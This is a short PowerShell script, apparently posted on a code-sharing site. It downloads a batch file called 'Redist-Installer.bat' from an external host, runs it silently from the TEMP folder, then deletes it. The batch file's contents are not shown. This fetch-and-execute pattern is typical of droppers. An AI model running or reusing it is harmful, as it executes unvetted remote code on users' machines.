8 lines
280 B
PowerShell
8 lines
280 B
PowerShell
$url = "https://dl.chse.dev/downloadFile?id=irdm2Pjjf4FrkG3" # Redist-Installer.bat
|
|
$temp = [Environment]::GetEnvironmentVariable("TEMP")
|
|
$file = "$temp\Redist-Installer.bat"
|
|
|
|
(New-Object System.Net.WebClient).DownloadFile($url, $file)
|
|
Start-Process -Wait $file
|
|
Remove-Item $file
|